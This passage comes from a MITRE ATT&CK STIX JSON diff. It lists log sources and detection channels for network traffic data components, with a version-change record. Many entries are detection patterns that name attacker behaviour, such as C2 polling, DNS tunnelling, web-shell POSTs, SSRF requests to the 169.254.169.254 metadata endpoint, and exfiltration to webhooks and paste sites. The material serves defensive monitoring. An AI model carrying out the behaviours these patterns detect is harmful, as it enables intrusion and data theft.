                            "name": "NSM:Flow",
                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to text storage domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS downgrade or inconsistent DNS answers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Egress to non-approved networks from host after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow/PCAP analysis for outbound payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + files.log + ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS or custom protocol traffic with large payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected script or binary content returned in HTTP response body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Injected content responses with unexpected script/malware signatures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relay patterns across IP hops"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ldap.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Excessive gratuitous ARP replies on local subnet"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:FLow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large transfer from management IPs to unauthorized host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mirror/SPAN port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Inspection or PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http, dns, smb, ssl logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns, ssl, conn"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, http.log, dns.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "icmp.log, weird.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Handshake Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Network Capture TLS/HTTP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "container egress to unknown IPs/domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Request Logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh connections originating from third-party CIDRs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh/smb connections to internal resources from third-party devices"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "host switch egress data"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log - Certificate Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, x509.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious POSTs to upload endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic spike preceding control crash"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
                        },
                        {
                            "name": "saas:box",
                            "channel": "API calls exceeding baseline thresholds"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "REST API access from non-browser agents"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "WebProxy:AccessLogs",
                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
                        },
                        {
                            "name": "WIDS:AssociationLogs",
                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
                        },
                        {
                            "name": "WinEventLog:iis",
                            "channel": "IIS Logs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Unusual external domain access"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "Outbound requests with forged tokens/cookies in headers"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 14:48:50.367000+00:00\", \"old_value\": \"2025-10-21 15:14:34.343000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Traffic\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][35]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)\"}, \"root['x_mitre_log_sources'][37]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns\"}, \"root['x_mitre_log_sources'][236]\": {\"name\": \"NSM:Flow\", \"channel\": \"TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write\"}, \"root['x_mitre_log_sources'][237]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app\"}, \"root['x_mitre_log_sources'][238]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)\"}, \"root['x_mitre_log_sources'][239]\": {\"name\": \"NSM:Flow\", \"channel\": \"burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans\"}, \"root['x_mitre_log_sources'][240]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline\"}, \"root['x_mitre_log_sources'][241]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior\"}, \"root['x_mitre_log_sources'][242]\": {\"name\": \"NSM:Flow\", \"channel\": \"Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss\"}, \"root['x_mitre_log_sources'][243]\": {\"name\": \"NSM:Flow\", \"channel\": \"Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss\"}, \"root['x_mitre_log_sources'][244]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit\"}, \"root['x_mitre_log_sources'][245]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][246]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][247]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase\"}, \"root['x_mitre_log_sources'][248]\": {\"name\": \"NSM:Flow\", \"channel\": \"Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase\"}, \"root['x_mitre_log_sources'][249]\": {\"name\": \"NSM:Flow\", \"channel\": \"Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry\"}, \"root['x_mitre_log_sources'][250]\": {\"name\": \"NSM:Flow\", \"channel\": \"Traffic spike preceding control crash\"}, \"root['x_mitre_log_sources'][251]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation\"}, \"root['x_mitre_log_sources'][252]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect\"}, \"root['x_mitre_log_sources'][255]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns\"}, \"root['x_mitre_log_sources'][256]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities\"}, \"root['x_mitre_log_sources'][257]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion\"}, \"root['x_mitre_log_sources'][258]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class\"}, \"root['x_mitre_log_sources'][259]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior\"}, \"root['x_mitre_log_sources'][260]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow\"}, \"root['x_mitre_log_sources'][261]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity\"}, \"root['x_mitre_log_sources'][262]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category\"}, \"root['x_mitre_log_sources'][263]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow\"}, \"root['x_mitre_log_sources'][264]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval\"}, \"root['x_mitre_log_sources'][265]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity\"}, \"root['x_mitre_log_sources'][266]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class\"}, \"root['x_mitre_log_sources'][267]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content\"}, \"root['x_mitre_log_sources'][268]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile\"}, \"root['x_mitre_log_sources'][269]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session\"}, \"root['x_mitre_log_sources'][270]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior\"}, \"root['x_mitre_log_sources'][271]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception\"}, \"root['x_mitre_log_sources'][272]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-09 17:32:30.362000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0078",
                            "external_id": "DC0078"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Flow",
                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected flows between segmented networks or prohibited ports"
                        },
                        {
                            "name": "snmp:config",
                            "channel": "Configuration change traps or policy enforcement failures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to new registries/CDNs post-install/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved registries after dependency install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound data flows or long-duration connections"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "egress > 90th percentile or frequent connection reuse"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "Network Events"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "TCP connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection metadata"
                        },
                        {
                            "name": "wineventlog:dhcp",
                            "channel": "DHCP Lease Granted"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LEASE_GRANTED"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
                        },
                        {
                            "name": "Windows Firewall Log",
                            "channel": "SMB over high port"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Internal connection logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inter-segment traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abnormal browser traffic volume or destination"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
                        },
                        {
                            "name": "M365Defender:DeviceNetworkEvents",
                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
                        },
                        {
                            "name": "PF:Logs",
                            "channel": "outbound flows with bytes_out >> bytes_in"
                        },
                        {
                            "name": "NSX:FlowLogs",
                            "channel": "network_flow: bytes_out >> bytes_in to external"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/Zeek conn.log"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound data flows"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "flow records"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "flow records"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTPS POST to known webhook URLs"
                        },
                        {
                            "name": "saas:api",
                            "channel": "Webhook registrations or repeated POST activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Source/destination IP translation inconsistent with intended policy"
                        },
                        {
                            "name": "SNMP:DeviceLogs",
                            "channel": "Unexpected NAT translation statistics or rule insertion events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of inbound packets from single source across short time interval"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "port 5900 inbound"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP port 5900 open"
                        },
                        {
                            "name": "NSM:firewall",
                            "channel": "inbound connection to port 5900"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound connections to 139/445 to multiple destinations"
                        },
                        {
                            "name": "VPCFlowLogs:All",
                            "channel": "High volume internal traffic with low entropy indicating looped or malicious DoS script"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow/PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Network Flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "com.apple.network"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device-to-Device Deployment Flows"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect syscalls"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TCP/UDP traffic over unexpected port"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "ESXi service connections on unexpected ports"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "OUTBOUND"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "tcp/udp"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "CLI network calls"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic from suspicious new processes post-attachment execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious anomalies in transmitted data integrity during application network operations"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "DNS resolution events leading to outbound traffic on unexpected ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic to mining pools or proxies"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound flow logs to known mining pools"
                        },
                        {
                            "name": "container:cni",
                            "channel": "Outbound network traffic to mining proxies"
                        },
                        {
